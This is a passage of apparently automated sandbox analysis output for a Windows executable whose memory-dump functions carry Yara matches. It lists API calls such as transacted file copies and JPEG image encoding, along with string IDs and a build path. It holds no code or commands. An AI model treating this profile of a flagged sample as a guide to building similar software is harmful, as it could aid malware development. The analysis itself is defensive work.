                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                      • Part of subcall function 00415505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,0041A94A,?,?,00000000), ref: 0041551B
                                                                                                      • Part of subcall function 00415505: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 00415541
                                                                                                      • Part of subcall function 00415505: CommitTransaction.KTMW32(00000000,?,0041A94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 0041554C
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted_strcat
                                                                                                    • String ID: $-<;$+*/"$:+$kf
                                                                                                    • API String ID: 1138659288-2765919554
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0043A5EB
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A5F9
                                                                                                    • int.LIBCPMT ref: 0043A610
                                                                                                      • Part of subcall function 00409703: std::_Lockit::_Lockit.LIBCPMT ref: 00409714
                                                                                                      • Part of subcall function 00409703: std::_Lockit::~_Lockit.LIBCPMT ref: 0040972E
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0043A64A
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A660
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0043A675
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
                                                                                                    • String ID:
                                                                                                    • API String ID: 2251497708-0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0043A6B1
                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A6BF
                                                                                                    • int.LIBCPMT ref: 0043A6D6
                                                                                                      • Part of subcall function 00409703: std::_Lockit::_Lockit.LIBCPMT ref: 00409714
                                                                                                      • Part of subcall function 00409703: std::_Lockit::~_Lockit.LIBCPMT ref: 0040972E
                                                                                                    • std::_Facet_Register.LIBCPMT ref: 0043A710
                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A726
                                                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0043A73B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prologRegister
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,004447F3,00000000,00000FA0,0048BA44,00000000,?,0044491E,00000004,InitializeCriticalSectionEx,0046F52C,InitializeCriticalSectionEx,00000000), ref: 004447C2
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary
                                                                                                    • String ID: api-ms-
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0041A4CF
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                      • Part of subcall function 004357CC: __EH_prolog.LIBCMT ref: 004357D1
                                                                                                      • Part of subcall function 004357CC: _strcat.LIBCMT ref: 0043582C
                                                                                                      • Part of subcall function 00415505: CreateTransaction.KTMW32(00000000,00000000,00000001,00000000,00000000,000000FF,00000000,?,?,00000000,?,?,0041A94A,?,?,00000000), ref: 0041551B
                                                                                                      • Part of subcall function 00415505: CopyFileTransactedA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000), ref: 00415541
                                                                                                      • Part of subcall function 00415505: CommitTransaction.KTMW32(00000000,?,0041A94A,?,?,00000000,?,?,?,2E231542,?,?,?,00000000,00000000), ref: 0041554C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DeallocateH_prologTransaction$CommitCopyCreateFileTransacted_strcat
                                                                                                    • String ID: 4hU@[Y]W$>$nc
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0041A112
                                                                                                      • Part of subcall function 00412D4F: _Deallocate.LIBCONCRT ref: 00412D64
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DeallocateH_prolog
                                                                                                    • String ID: TBip$dm|{$p
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,?,?,00458064,?,00485030,0000000C,00458116,004225CF), ref: 0045818C
                                                                                                    • GetLastError.KERNEL32(?,00458064,?,00485030,0000000C,00458116,004225CF), ref: 00458196
                                                                                                    • __dosmaperr.LIBCMT ref: 004581C1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                    • String ID: P#o
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • std::exception::exception.LIBCMT ref: 00424408
                                                                                                      • Part of subcall function 0040903F: ___std_exception_copy.LIBVCRUNTIME ref: 0040905D
                                                                                                    • std::exception::exception.LIBCMT ref: 00424420
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: std::exception::exception$___std_exception_copy
                                                                                                    • String ID: P>B$P>B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • _free.LIBCMT ref: 0046693E
                                                                                                    • _free.LIBCMT ref: 00466967
                                                                                                    • SetEndOfFile.KERNEL32(00000000,0046413C,00000000,0045A93D,?,?,?,?,?,?,?,0046413C,0045A93D,00000000), ref: 00466999
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,0046413C,0045A93D,00000000,?,?,?,?,00000000), ref: 004669B5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _free$ErrorFileLast
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • WriteConsoleW.KERNEL32(?,00421A56,?,00000000,?,?,0046347F,?,00000001,?,~eD,?,0045796B,00000000,00000005,~eD), ref: 00466782
                                                                                                    • GetLastError.KERNEL32(?,0046347F,?,00000001,?,~eD,?,0045796B,00000000,00000005,~eD,00000000,~eD,?,00457EBF,00000010), ref: 0046678E
                                                                                                      • Part of subcall function 00466754: CloseHandle.KERNEL32(FFFFFFFE,0046679E,?,0046347F,?,00000001,?,~eD,?,0045796B,00000000,00000005,~eD,00000000,~eD), ref: 00466764
                                                                                                    • ___initconout.LIBCMT ref: 0046679E
                                                                                                      • Part of subcall function 00466716: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00466745,0046346C,~eD,?,0045796B,00000000,00000005,~eD,00000000), ref: 00466729
                                                                                                    • WriteConsoleW.KERNEL32(?,00421A56,?,00000000,?,0046347F,?,00000001,?,~eD,?,0045796B,00000000,00000005,~eD,00000000), ref: 004667B3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                    • String ID:
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 004529CD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorHandling__start
                                                                                                    • String ID: pow
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: RR$dm|{
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog2
                                                                                                    • String ID: ", "$: "
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: false$true
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 0042C0E2
                                                                                                    • GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 0042C107
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EncodersGdipImage$Size
                                                                                                    • String ID: image/jpeg
                                                                                                    • API String ID: 864223233-3785015651
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 0041C9F1
                                                                                                      • Part of subcall function 00412F2D: _Deallocate.LIBCONCRT ref: 00412F3C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DeallocateH_prolog
                                                                                                    • String ID: 6rkw$[json.exception.
                                                                                                    • API String ID: 3708980276-421156741
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • object != nullptr, xrefs: 0042658D
                                                                                                    • A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 00426588
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
                                                                                                    • API String ID: 3519838083-2355325030
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • object != nullptr, xrefs: 004265E9
                                                                                                    • A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 004265E4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: A:\_Work\rc-build-v1-exe\json.hpp$object != nullptr
                                                                                                    • API String ID: 3519838083-2355325030
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%